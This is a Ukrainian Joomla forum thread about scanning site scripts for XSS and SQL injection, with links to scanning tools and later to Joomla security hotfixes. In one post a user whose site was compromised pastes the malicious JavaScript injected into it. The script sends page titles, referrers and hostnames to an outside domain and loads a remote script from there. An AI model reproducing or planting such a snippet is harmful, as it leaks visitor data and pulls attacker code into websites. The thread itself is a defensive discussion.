Форум Joomla! Україна
  • Головна
  • Пошук
  • Користувачі
  • Команда форуму
  • Реєстрація
  • Увійти
    Увійти
    Ім’я користувача
    Пароль: Забули пароль?
     
  • Реєстрація
  • Увійти
Форум Joomla! Україна Веб-розробка Хостинг та домени Безпека сервера (хостингу) та сайту v
1 2 Наступне »
Перевірка скриптів на наявність XSS/SQLI


 
  • 0 голос(ів) - 0 у середньому
Перевірка скриптів на наявність XSS/SQLI
shaman
Не в мережі

Модератор

Дописів: 287
Тем: 44
Приєднався: 07.05.2007, 07:44 PM
Репутація: 0
#1
21.07.2008, 03:55 PM
Проект венського Університету Інформаційних Технологій розробив утиліту для комплексного сканування файлів на наявність вразливостей XSS та SQL injection.

Програма написана на мові java і здатна працювати локально. Скачати та ознайомитись з документацією можна тут:
_http://pixybox.seclab.tuwien.ac.at/pixy/index.php
Також існує тестова онлайн-версія, де в реальному часі можна просканувати підозрілий файл:
_http://pixybox.seclab.tuwien.ac.at/pixy/webinterface.php

Зауваження
При скануванні файлів joomla, скрипт вважає підозрілою частовживану змінну

проте, як зазначив Smart на joomlaforum.ru - це не є критичною вразливістю, особливо якщо вимкнені register_globals.

п.с. Звісно, програма не замінить людську логіку, проте значно звузить коло пошуку і збереже дорогий адміністратору час Wink
BitsyBay - Магазин авторських розширень за BitCoin | OpenCart - Україна | Fork me on Github
Dutch
Не в мережі

Адміністратор

Дописів: 1,195
Тем: 58
Приєднався: 28.10.2006, 04:49 PM
Репутація: 4
#2
09.01.2016, 07:36 PM
Я б ще додав би до списку хороший скрипт ai-bolit!

https://revisium.com/ai/
Хостинг для Joomla | Joomla! Україна | Підтримайте проект Joomla! Україна пожертвуванням
Заробляйте гроші на своєму сайті через SAPE
fedun
Не в мережі

Junior Member

Дописів: 6
Тем: 1
Приєднався: 23.06.2015, 01:28 PM
Репутація: 0
#3
15.01.2016, 07:39 PM
В мене ця фігня. Як закрити діру, на всіх версіях джумла включаючи останню. :evil: :evil: :evil:

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://www.elkonenerji.com.tr/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>
fedun
Не в мережі

Junior Member

Дописів: 6
Тем: 1
Приєднався: 23.06.2015, 01:28 PM
Репутація: 0
#4
25.01.2016, 11:46 AM
по ходу закрили дирку, критичні виправлення безпеки у всіх версіях джумла, обновляємось до 3,4,8
https://docs.joomla.org/Security_hotfixe...L_versions
для старих версій є патчі :Yahoo!:
« Попередня | Наступна »

Переглядають цю тему: Гості: 1



Можливо схожі теми...
Тема Автор Відповіді Перегляди Останній допис
  Антивірус вказує на наявність вірусу в файлах російської локалізації Oleksandr 0 2,393 менш1 хвилини тому
Останній допис:

  • Версію для друку
  • Підписатися на цю тему
Швидкий перехід:

  • Команда форуму
  • Зв’яжіться з нами
  • Joomla! Україна
  • Повернутись на початок
  • Легкий режим
  • Позначити всі форуми прочитаними
  • RSS канал
Лінійний режим
Каскадний режим